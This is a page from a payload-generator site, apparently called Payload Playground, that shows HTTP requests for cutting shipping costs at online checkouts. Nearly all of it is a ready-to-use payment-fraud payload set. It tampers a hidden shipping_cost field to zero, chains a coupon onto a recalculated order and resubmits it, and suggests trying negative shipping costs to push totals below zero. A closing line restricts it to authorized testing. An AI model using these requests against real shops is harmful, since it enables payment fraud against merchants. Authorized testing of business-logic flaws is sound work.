Skip to content
Payload Playground
$loading...
# ── Shipping Cost Manipulation ────────────────────────────────────────
# Goal: bypass shipping cost by tampering hidden fields

POST /checkout/shipping HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...

shipping_method=standard&shipping_cost=0&order_total=100.00&item_id=ITEM-123

# Method 2: Add free shipping coupon after total calculation
# Step 1: Calculate total (100.00 + shipping cost)
POST /api/cart/calculate
{"item_id": "ITEM-123", "quantity": 1}
# Response: {"total": 100.00, "shipping": 9.99, "order_id": "ord_123"}

# Step 2: Apply free shipping coupon to calculated order
POST /api/cart/coupon
{"coupon_code": "FREESHIP", "order_id": "ord_123"}

# Step 3: Re-submit with shipping_cost=0 from modified response
POST /checkout/confirm
{"order_id": "ord_123", "shipping_cost": 0, "total": 100.00}

# Also test: negative shipping cost to reduce order total below zero
For authorized penetration testing and security research only. Only test systems you own or have explicit written permission to test.
Business Logic Vulnerability Generator — Payment Fraud, Workflow Bypass & Race Conditions | Payload Playground | Payload Playground